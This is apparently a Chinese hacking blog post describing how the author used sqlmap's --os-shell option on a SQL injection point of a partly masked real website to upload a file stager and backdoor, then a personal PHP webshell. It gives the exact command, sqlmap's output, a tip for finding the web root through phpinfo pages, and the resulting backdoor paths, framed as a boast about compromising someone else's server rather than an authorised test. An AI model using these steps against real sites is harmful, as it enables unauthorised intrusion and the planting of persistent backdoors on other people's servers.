sqlmap注入点上传shell

借鉴 http://www.2cto.com/Article/201206/138091.html

 

俺稍微改了一下 - = 凑合着用 反正我特么的拿到shell了.

 

记录开始.

 

sqlmap.py -u "http://www.****.cn/job/index.php?key=1" --os-shell

 

[14:39:11] [INFO] the back-end DBMS is MySQL

web server operating system: Windows 2003

web application technology: Microsoft IIS 6.0, PHP 5.2.9

back-end DBMS: MySQL 5.0

[14:39:11] [INFO] going to use a web backdoor for command prompt

[14:39:11] [INFO] fingerprinting the back-end DBMS operating system

[14:39:12] [INFO] the back-end DBMS operating system is Windows

[14:39:12] [INFO] trying to upload the file stager

which web application language does the web server support?

[1] ASP

[2] ASPX

[3] PHP (default)

[4] JSP

>

 

当然 这个是php的站 我们选择3 PHP (default)

 

[14:42:09] [WARNING] unable to retrieve the web server document root

please provide the web server document root [C:/xampp/htdocs/,C:/Inetpub/wwwroot

/]:

 

不知道路径咋办呢 - - 用扫描器扫扫目录底下的phpinfo.php或者别的文件名 看下路径

 

得到路径之后填写到刚跳出来的那个里面

 

[14:42:09] [WARNING] unable to retrieve the web server document root

please provide the web server document root [C:/xampp/htdocs/,C:/Inetpub/wwwroot

/]:E:/Web/ygbh

 

然后回车之后又跳几行 就是让你选择上传在哪个目录 我们就直接回车 不管它 默认空着就好

 

[14:44:35] [WARNING] unable to retrieve any web server path

please provide any additional web server full path to try to upload the agent [E

nter for None]:

 

接下来回车之后 sqlmap变成这样

 

[14:45:53] [INFO] the file stager has been successfully uploaded on 'E:/Web/ygbh

' ('http://www.****.cn:80/tmpuodot.php')

[14:45:53] [INFO] the backdoor has probably been successfully uploaded on 'E:/We

b/ygbh', go with your browser to 'http://www.****.cn:80//tmpbcmnd.php' and enjoy

it!

[14:45:53] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER

os-shell>

 

- - tmpuodot.php tmpbcmnd.php 你会发现有俩文件！！ 是两个文件！！九区那个估计是看走眼了

 

一个是上传的文件！ 一个是执行cmd的文件！是俩文件！

 

打开http://www.****.cn/tmpuodot.php 上传我们自己的php马 - = 另外一个不管它

 

完!